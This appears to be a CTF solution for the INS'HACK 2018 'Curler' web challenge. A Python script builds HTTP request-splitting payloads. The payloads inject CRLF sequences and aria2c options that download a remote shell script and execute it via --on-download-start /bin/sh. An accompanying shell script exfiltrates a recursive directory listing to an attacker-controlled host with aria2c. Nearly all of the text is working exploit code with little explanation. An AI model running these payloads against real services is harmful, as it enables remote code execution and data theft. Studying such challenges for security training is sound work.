INS'HACK CTF 2018 - Web Curler - HTTP request splitting to replace aria2c options, then, use aria2c options to execute our sh commands - RushB%

pwn_curler.py

import bson

CRLF = '\\u000D\\u000A'

def make_payload(url, inject_config):
    inject_hostname = "localhost"

    pld = url + " HTTP/1.1" + CRLF
    pld += "Host: " + inject_hostname + CRLF
    pld += "Accept-Encoding: identity" + CRLF

    options = []
    for key, value in inject_config.items():
        options.append(key + "=" + str(value))

    params = str(bson.dumps({
        "options": options,
    }))[2:-1]

    pld += "Content-Length: " + str(len(params) - params.count('\\x') * 3) + CRLF * 2
    pld += params.replace("\\x", "\\u00") + CRLF * 4
    pld += "POST /?url=" + url

    return '"' + pld.replace('"', '\\"') + '"'


downloader = make_payload("http://hosting.dn/script.sh", {
    "--connect-timeout": 9,
    "--out": "0033000220000777",
})

runner = make_payload("http://hosting.dn/script.sh", {
    "--connect-timeout": 9,
    "--gid": "0033000220000777",
    "--on-download-start": "/bin/sh"
})

print("Pls submit with 2 and run with 3 this payload : \n\n", downloader)
print("\n")
print("Then, pls submit with 2 and run with 3 this payload : \n\n", runner)

shell_example.sh

#!/bin/sh

dmp=`ls -la -R`
aria2c "http://<ip>:<port>/?$dmp"